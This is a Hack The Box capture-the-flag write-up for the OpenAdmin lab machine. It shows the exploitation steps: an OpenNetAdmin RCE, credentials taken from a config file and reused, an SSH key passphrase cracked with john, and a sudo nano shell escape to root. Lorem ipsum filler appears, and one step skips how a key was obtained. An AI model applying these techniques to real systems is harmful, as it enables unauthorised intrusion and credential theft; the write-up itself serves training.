Openadmin - Hack The Box

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
hackthebox
Author

0xPThree

Published

January 7, 2020

“Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.”

██╗ ██╗███████╗███████╗██████╗ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██║ ██║███████╗█████╗ ██████╔╝ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ╚██████╔╝███████║███████╗██║ ██║ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝

  1. root@p3:/opt/htb/machines/resolute# nmapAutomatorDirb.sh 10.10.10.171 All PORT STATE SERVICE 22/tcp open ssh 80/tcp open http

    • http://openadmin.htb/index.html (CODE:200|SIZE:10918)
    • http://openadmin.htb/server-status (CODE:403|SIZE:278)
    • http://openadmin.htb/artwork/index.html (CODE:200|SIZE:14461)
    • http://openadmin.htb/music/index.html (CODE:200|SIZE:12554)

  2. Looking through the websites we find that “Admin” has made a lot of posts on /artwork/blog.html, this might be a possible user. Also a testemonial from Craig Stephen, also possible user?

    On /music/index.html, pressing the Login button gives us what looks like admin privs for OpenNetAdmin http://openadmin.htb/ona/ The application is running on version 18.1.1, which is NOT the latest release. A quick google shows us that this version has a RCE vulnerability.

  3. Running the RCE script gives us a “shell” as user www-data with limited privs. We are unable to traverse, but can execute commands root@p3:/opt/htb/machines/openadmin# ./ona-expl.sh http://openadmin.htb/ona/ $ whoami www-data

    Enumerating through the folders of /opt/ona/www we find a config file for the database connection, and within credentials. $ cat local/config/database_settings.inc.php array ( ‘databases’ => array ( 0 => array ( ‘db_type’ => ‘mysqli’, ‘db_host’ => ‘localhost’, ‘db_login’ => ‘ona_sys’, ‘db_passwd’ => ‘n1nj4W4rri0R!’, ‘db_database’ => ‘ona_default’, ‘db_debug’ => false, ), ), ‘description’ => ‘Default data context’, ‘context_color’ => ‘#D3DBFF’, ), );

    $ ls -al /home/ total 16 drwxr-xr-x 4 root root 4096 Nov 22 18:00 . drwxr-xr-x 24 root root 4096 Nov 21 13:41 .. drwxr-x— 6 jimmy jimmy 4096 Jan 7 06:29 jimmy drwxr-x— 6 joanna joanna 4096 Nov 28 09:37 joanna

We got 2 users (jimmy & joanna) and 1 password (n1nj4W4rri0R!)

  1. We are able to SSH with the credentials jimmy:n1nj4W4rri0R! Enumerating through the box we find /var/www/internal and within index.php, main.php and logout.php.

    main.php has some interesting code - if user = jimmy and password = some-hash, then we are able to access main.php

    <?php $msg = ’’;

    if (isset(\(_POST['login']) && !empty(\)_POST[‘username’]) && !empty(\(_POST['password'])) { if (\)_POST[‘username’] == ‘jimmy’ && hash(‘sha512’,$_POST[‘password’]) == ‘00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1’) { $_SESSION[‘username’] = ‘jimmy’; header(“Location: /main.php”); } else { $msg = ‘Wrong username or password.’; } }

  2. First we need to find the port this local webserver is running on, we use ss for this. jimmy@openadmin:/var/www/internal$ ss -tulpn Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0: tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0: tcp LISTEN 0 128 127.0.0.1:52846 0.0.0.0: tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0: tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0: tcp LISTEN 0 128 :80 : tcp LISTEN 0 128 [::]:22 [::]:*

    We know all of the ports except 52846, this is most likely the local webserver. Try to curl it and see if it looks right. jimmy@openadmin:/var/www/internal$ curl localhost:52846 ..

    Enter Username and Password

  3. Trying to login with the extracted private key requires an passphrase key, so we need to crack it. The key is in .pem format so before cracking we need to convert it using ssh2john.

    root@p3:/usr/share/john# python ssh2john.py /opt/htb/machines/openadmin/joanna-id_rsa > /opt/htb/machines/openadmin/hash-joanna root@p3:/opt/htb/machines/openadmin# john –wordlist=/usr/share/wordlists/rockyou.txt hash-joanna Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 12 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press ‘q’ or Ctrl-C to abort, almost any other key for status bloodninjas (/opt/htb/machines/openadmin/joanna-id_rsa) 1g 0:00:00:01 DONE (2020-01-07 14:43) 0.5882g/s 8436Kp/s 8436Kc/s 8436KC/s 0125457423 ..*7¡Vamos! Session completed

    Password for Joanna’s Private Key: bloodninjas

  4. Login as Joanna and grab user.txt root@p3:/opt/htb/machines/openadmin# ssh joanna@openadmin.htb -i joanna-id_rsa Enter passphrase for key ‘joanna-id_rsa’: bloodninjas joanna@openadmin:~$ cat user.txt c9b2****************************

██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████

██████╗ ██████╗ ██████╗ ████████╗ ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝ ██████╔╝██║ ██║██║ ██║ ██║ ██╔══██╗██║ ██║██║ ██║ ██║ ██║ ██║╚██████╔╝╚██████╔╝ ██║ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝

  1. sudo -l shows us that we can run “sudo /bin/nano /opt/priv” without any password. Looking at gtfobins there is a privesc using nano to get a root shell.

    joanna@openadmin:/opt$ sudo /bin/nano /opt/priv Press CTRL + R to for “Read File” and then CTRL + X for “Execute Command”. Next, write ‘reset; sh 1>&0 2>&0’ to get shell

    Command to execute: reset; sh 1>&0 2>&0 # # # whoami root # cat /root/root.txt 2f90****************************

██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████

██╗███╗ ██╗███████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ ██║████╗ ██║██╔════╝██╔═══██╗██╔══██╗████╗ ████║██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██╔████╔██║███████║ ██║ ██║██║ ██║██╔██╗ ██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║╚██╔╝██║██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ ██║██║ ╚████║██║ ╚██████╔╝██║ ██║██║ ╚═╝ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝

OpenNetAdmin 18.1.1 RCE https://packetstormsecurity.com/files/155406/OpenNetAdmin-18.1.1-Remote-Code-Execution.html

GTFOBINS Nano https://gtfobins.github.io/gtfobins/nano/#sudo